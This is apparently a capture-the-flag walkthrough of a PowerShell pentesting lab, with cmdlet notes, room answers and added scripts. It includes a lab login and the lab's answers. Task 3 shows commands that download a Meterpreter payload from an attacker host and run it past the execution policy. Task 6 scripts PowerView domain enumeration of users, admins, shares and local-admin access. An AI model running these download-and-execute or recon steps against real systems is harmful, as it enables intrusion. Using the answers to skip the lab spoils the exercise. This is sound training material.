Powershell for Pentesters
This room covers the principal uses of PowerShell in penetration tests: interacting with files, scanning the network and enumerating the system.
This room can be found here. This section covers the basics of PowerShell that are useful in any engagement.
Target machine SSH credentials:
Username: walter
Password: Kowacs123!
Once connected over SSH, run powershell to drop from the command prompt into PowerShell.
Task 1
Most command-line pentest training focuses on Linux, but most corporate systems run Windows, so a red team member needs to feel at home in both operating systems.
There are several PowerShell scripts useful in penetration tests, such as PowerView and Nishang. The downside is that these and other well-known scripts are detected by most antivirus (AV) software.
Question 1: What useful PowerShell script did you find on Walter's desktop?
powerview.ps1
- Running dir in Walter's desktop directory lists the files.
Task 2
Start-Process - Starts a process, such as notepad.
Get-Process - Lists all running processes. Can also be used with the -Name parameter to filter for a specific process.
(command) | Export-Csv - Exports the output of the piped command into a .csv file that may be easier to read or to import elsewhere.
Get-Content - Shows the contents of a file, similar to the cat command on Linux.
Copy-Item - Copies an item.
Move-Item - Moves an item.
Get-FileHash - Computes the hash of the specified file. The default algorithm is SHA256; use -Algorithm to select MD5 or SHA1.
Question 1: What is the MD5 hash value of the file on Walter's desktop?
501570FFBA7FACE69D61DA1A0843E89A
- Get-FileHash -Algorithm MD5 .\Desktop\powerview.ps1 will give us the
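The cmdlets above become useful when they are chained on objects rather than typed one at a time. The following is an added example, not code from the room: it inventories running processes to CSV, hashes every .ps1 under a directory with both MD5 and SHA256, and flags any file whose MD5 equals the hash from the answer above. The target directory, output directory and file names are assumptions for illustration.

```powershell
# Added example (not from the room): process inventory plus script hashing with a
# known-hash check. Paths and file names are assumptions.
$Target   = "$env:USERPROFILE\Desktop"               # directory to inspect (assumption)
$KnownMd5 = '501570FFBA7FACE69D61DA1A0843E89A'       # MD5 from the room's answer
$OutDir   = "$env:TEMP\triage"                       # where results go (assumption)

New-Item -ItemType Directory -Path $OutDir -Force | Out-Null

# 1. Process inventory. Select the properties explicitly: Export-Csv otherwise
#    writes every property of the object, which is unreadable.
Get-Process |
    Select-Object Id, ProcessName, Path |
    Export-Csv -Path (Join-Path $OutDir 'processes.csv') -NoTypeInformation

# 2. Hash every .ps1 under the target with both algorithms. Get-FileHash returns
#    upper-case hex in the .Hash property.
$hashes = Get-ChildItem -Path $Target -Filter *.ps1 -Recurse -File |
    ForEach-Object {
        [pscustomobject]@{
            Path   = $_.FullName
            Size   = $_.Length
            MD5    = (Get-FileHash -Path $_.FullName -Algorithm MD5).Hash
            SHA256 = (Get-FileHash -Path $_.FullName -Algorithm SHA256).Hash
        }
    }
$hashes | Export-Csv -Path (Join-Path $OutDir 'hashes.csv') -NoTypeInformation

# 3. Compare against the known hash. ($matches is a PowerShell automatic
#    variable, so a different name is used for the result.)
$hits = $hashes | Where-Object { $_.MD5 -eq $KnownMd5 }
if ($hits) {
    "Known file present:"
    $hits | Format-Table Path, MD5 -AutoSize
    # Copy the evidence rather than moving the original out from under the user.
    $hits | ForEach-Object { Copy-Item -Path $_.Path -Destination $OutDir }
    # Peek at the first lines of each matched script without loading the whole file.
    $hits | ForEach-Object { Get-Content -Path $_.Path -TotalCount 5 }
} else {
    "No file matched $KnownMd5"
}
```

Hashing with SHA256 as well as MD5 matters because MD5 collisions are cheap to produce; a match on MD5 alone identifies a file for the purposes of a room, not for evidence.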
Task 3
Downloading files
There are multiple ways to download files from a server using PowerShell. One of the quickest is the .NET WebClient class and its DownloadFile method:
(New-Object System.Net.WebClient).DownloadFile('URL/File', 'Output-File')
Example:
(New-Object System.Net.WebClient).DownloadFile('http://10.0.2.8/meterpreter-64.ps1', 'meterpreter.ps1')
This connects to the host 10.0.2.8, downloads the meterpreter-64.ps1 file and saves it as meterpreter.ps1. Note that DownloadFile resolves a relative output path against the process working directory, which is not always the same as the PowerShell current location, so pass a full path when in doubt.
Another method is Invoke-WebRequest:
Invoke-WebRequest "URL/File" -OutFile "File"
Invoke-WebRequest "http://10.0.2.8/meterpreter-64.ps1" -OutFile "meterpreter.ps1"
Execution Policies
Once we have the file downloaded, we can run it, but we may run into an ExecutionPolicy issue. Microsoft states that the execution policy is NOT a security boundary; it is a safety measure against accidentally running scripts, and the user can bypass it.
The current state of the ExecutionPolicy configuration, per scope, can be seen using Get-ExecutionPolicy -List
Execution policies can have seven different values:
AllSigned - Scripts can run, but every script, local or downloaded, must be signed by a trusted publisher.
Bypass - All scripts can run, and no warnings or prompts are displayed.
Default - Refers to Restricted for Windows clients and RemoteSigned for Windows servers.
RemoteSigned - Scripts can run; scripts downloaded from the internet must be signed by a trusted publisher, while local scripts do not need a signature.
Restricted - The default configuration for Windows clients. Allows individual commands to run but does not allow scripts.
Undefined - No execution policy is set in this scope. If every scope is Undefined, the Default policy applies.
Unrestricted - Unsigned scripts run; a warning is shown before running a script downloaded from the internet.
We have several alternatives to bypass the ExecutionPolicy, but some methods (such as changing the LocalMachine scope) require administrator privileges. The most common way is:
powershell -ExecutionPolicy Bypass -File .\(File)
Example:
powershell -ExecutionPolicy Bypass -File .\meterpreter.ps1
PowerShell accepts any unambiguous prefix of a parameter name, so the shorter form works as well:
powershell -Exec Bypass -File .\(File)
Example:
powershell -Exec Bypass -File .\meterpreter.ps1
We can also change the ExecutionPolicy for the current process only, which needs no administrator rights and persists nothing, using Set-ExecutionPolicy Bypass -Scope Process and then running the file.
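The download and the policy bypass are one procedure in practice. The following is an added example, not code from the room, that fetches a script with WebClient using a full output path, shows every policy scope, checks whether the file carries the Zone.Identifier stream (the Mark of the Web that RemoteSigned acts on) and then runs it under a process-scoped Bypass. The URL and file name are the ones the room uses; the rest of the flow is an assumption.

```powershell
# Added example (not from the room): download, inspect and run a script without
# touching the persistent execution policy. URL and file name follow the room's example.
$Url  = 'http://10.0.2.8/meterpreter-64.ps1'
$File = 'meterpreter.ps1'

# WebClient.DownloadFile resolves relative paths against the process working
# directory ([Environment]::CurrentDirectory), which is NOT necessarily the
# location shown by Get-Location. Always build a full path.
$FullPath = Join-Path (Get-Location).Path $File
(New-Object System.Net.WebClient).DownloadFile($Url, $FullPath)

# Equivalent with the cmdlet; here -OutFile is resolved against Get-Location.
# Invoke-WebRequest -Uri $Url -OutFile $File -UseBasicParsing

# Show every scope that contributes to the effective policy.
Get-ExecutionPolicy -List | Format-Table -AutoSize
"Effective policy: $(Get-ExecutionPolicy)"

# RemoteSigned only blocks unsigned scripts that carry the Zone.Identifier
# alternate data stream. Check whether this file has it.
$mow = Get-Item -Path $FullPath -Stream Zone.Identifier -ErrorAction SilentlyContinue
if ($mow) {
    "File carries a Mark of the Web:"
    Get-Content -Path $FullPath -Stream Zone.Identifier
    Unblock-File -Path $FullPath      # removes the stream; no admin rights needed
} else {
    "No Zone.Identifier stream on $FullPath"
}

# Option A: relax the policy for this process only. Nothing is written to the
# registry and the change disappears when the process exits.
Set-ExecutionPolicy -ExecutionPolicy Bypass -Scope Process -Force
& $FullPath

# Option B: spawn a child powershell with the policy set on its command line.
# powershell.exe -ExecutionPolicy Bypass -File $FullPath
```

Because the process scope is the highest-precedence scope, Option A overrides a LocalMachine or CurrentUser setting without any privilege; the only thing that can stop it is a Group Policy that sets the policy (MachinePolicy or UserPolicy), which is why Get-ExecutionPolicy -List is worth reading first.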
Task 4
Get-Hotfix - Enumerates already installed patches. Get-Hotfix | Format-List | findstr InstalledOn prints only the InstalledOn lines, and Get-Hotfix | Format-Table HotFixID lists just the KB identifiers.
Format-List - Shows every property of the piped objects, for example dir | Format-List.
Out-File - Saves output to a file for later use, for example Get-Hotfix | Out-File Hotfixes.txt.
Question 1: What Windows Security Update was installed on 5/15/2019?
KB4499728
- Get-HotFix can give us our answer.
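Grepping formatted text with findstr loses the object, so a date match has to be done by eye. The following is an added example, not code from the room: it answers the question above by filtering Get-HotFix objects on the InstalledOn date, reports how stale the newest patch is, and writes the security updates to CSV. The date is the one the room asks about; the output file name is an assumption.

```powershell
# Added example (not from the room): filter Get-HotFix objects instead of grepping
# formatted text. Date from the room's question; output path is an assumption.
$Date = Get-Date '2019-05-15'

# InstalledOn is a [datetime] (it is empty for some entries, hence the null check).
# Comparing the .Date part ignores the time of day.
$onDate = Get-HotFix | Where-Object { $_.InstalledOn -and $_.InstalledOn.Date -eq $Date.Date }
"Updates installed on $($Date.ToShortDateString()):"
$onDate | Format-Table HotFixID, Description, InstalledOn -AutoSize

# Patch age is what a pentester actually wants: newest first, then the gap in days.
$latest = Get-HotFix |
    Where-Object InstalledOn |
    Sort-Object InstalledOn -Descending |
    Select-Object -First 1
if ($latest) {
    $age = [int]((Get-Date) - $latest.InstalledOn).TotalDays
    "Latest patch: $($latest.HotFixID) on $($latest.InstalledOn.ToString('yyyy-MM-dd')) ($age days ago)"
}

# Security updates only, as objects, for the report.
Get-HotFix |
    Where-Object { $_.Description -eq 'Security Update' } |
    Select-Object HotFixID, Description, InstalledOn, InstalledBy |
    Sort-Object InstalledOn |
    Export-Csv -Path .\hotfixes.csv -NoTypeInformation
```

Get-HotFix reads Win32_QuickFixEngineering, which records component-based updates only; applications patched through MSI and Defender definition updates do not appear there, so an empty result for a recent date does not prove the host is unpatched.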
Task 6
PowerView is one of the most effective ways to gather information on the domain. The module can be downloaded from here.
Once we download the file, we need to bypass the execution policy and then import the module. Note that running powershell -Exec Bypass .\powerview.ps1 executes the script in a child process that exits immediately, so nothing is imported into the current session. Instead, start a new shell with the bypass policy and import the module inside it:
powershell -Exec Bypass
Import-Module .\powerview.ps1
With PowerView imported we can use it to obtain information on the domain configuration and users.
Get-NetDomainController - Collects information on the domain controller.
Get-NetUser - Provides a list of domain users. Depending on the size of the company, we may want to output this to a .csv. Get-NetUser | select -ExpandProperty lastlogon can be used to view each user's last logon date/time.
Get-NetComputer - Enumerates systems joined to the domain.
Get-NetGroup - Enumerates existing groups. Get-NetGroupMember "Domain Admins" can be used to list the members of the "Domain Admins" group.
Find-DomainShare - Lists available shares.
Get-NetGPO - Gathers information on policies enforced through Group Policy.
Find-LocalAdminAccess - Lists systems in the domain that you may access as a local administrator.
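The commands above answer the questions below one at a time. The following is an added example, not code from the room or from PowerView itself, that runs them as one recon pass and keeps the results as objects: disabled accounts are detected from the userAccountControl ACCOUNTDISABLE bit instead of being counted by eye, Domain Admins are resolved recursively so nested groups are not missed, and default shares and default GPOs are filtered out. It assumes PowerView is already imported in a session where the execution policy permits it; the output directory is an assumption.

```powershell
# Added example (not from the room): a small domain recon pass built on the
# PowerView commands above. Assumes PowerView is already imported.
$OutDir = "$env:TEMP\recon"                          # assumption
New-Item -ItemType Directory -Path $OutDir -Force | Out-Null

# Domain controller(s) we are actually talking to.
Get-NetDomainController | Select-Object Name, IPAddress, OSVersion | Format-Table -AutoSize

# Users, with userAccountControl kept so the disabled flag can be tested.
$users = Get-NetUser -Properties samaccountname,givenname,sn,description,useraccountcontrol,lastlogon
$users | Export-Csv -Path (Join-Path $OutDir 'users.csv') -NoTypeInformation

# ACCOUNTDISABLE is bit 0x2 of userAccountControl. Current PowerView renders the
# attribute as a flags enum and older versions as an integer; casting to [int]
# handles both.
$disabled = $users | Where-Object { ([int]$_.useraccountcontrol -band 2) -ne 0 }
"Disabled accounts: $(@($disabled).Count)"
$disabled | Format-Table samaccountname, givenname, sn -AutoSize

# Any populated description is worth reading: passwords and ticket IDs end up there.
$users | Where-Object description | Format-Table samaccountname, description -AutoSize

# Domain Admins, recursively, so members of nested groups are included.
$das = Get-NetGroupMember -Identity 'Domain Admins' -Recurse
"Domain Admins ($(@($das).Count)):"
$das | Format-Table MemberName, MemberObjectClass -AutoSize

# Shares we can read, minus the defaults every host exposes.
Find-DomainShare -CheckShareAccess |
    Where-Object { $_.Name -notmatch '^(ADMIN\$|C\$|IPC\$|NETLOGON|SYSVOL|print\$)$' } |
    Select-Object ComputerName, Name, Remark |
    Tee-Object -FilePath (Join-Path $OutDir 'shares.txt')

# GPOs other than the two that exist in every domain.
Get-NetGPO |
    Where-Object { $_.displayname -notmatch '^Default Domain' } |
    Select-Object displayname, gpcfilesyspath, whencreated |
    Format-Table -AutoSize

# Hosts where the current user is a local administrator. This touches every
# computer in the domain, so it is slow and noisy on a real network.
Find-LocalAdminAccess | Tee-Object -FilePath (Join-Path $OutDir 'localadmin.txt')
```

Every query here goes to the domain controller over LDAP except Find-DomainShare and Find-LocalAdminAccess, which connect to each host; on an engagement with a monitoring requirement those two are the ones to run last and with a scope.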
Question 1: One of the accounts has a special description, what is it?
IDF-17828290
- Get-NetUser -properties distinguishedname,cn,sn,description,useraccountcontrol can give us the details. We can of course add further properties if we see fit.
Question 2: How many accounts are disabled?
4
- The output of the previous command gives us our answer.
Question 3: How many users are in the "domain admins" group?
3
- Get-NetGroupMember "Domain Admins" can give us our answer.
Question 4: Which users are in the "domain admins" group?
usand, ssilk, ServerAdmin
- The previous command gives us our answer.
Question 5: List shares, what is the name of the "interesting" share?
operationfiles
- Find-DomainShare -CheckShareAccess; most of these look pretty normal except this one.
Question 6: What is the name of the user-created Group Policy?
Disable WinDef
- Running Get-NetGPO -properties displayname shows the list of Group Policy display names.
Question 7: What are the first names of the users whose accounts were disabled?
Daniel, Ursula
- Looking at our previous command, Get-NetUser -properties distinguishedname,cn,sn,description,useraccountcontrol, we can see the first and last names of the users and which ones are disabled.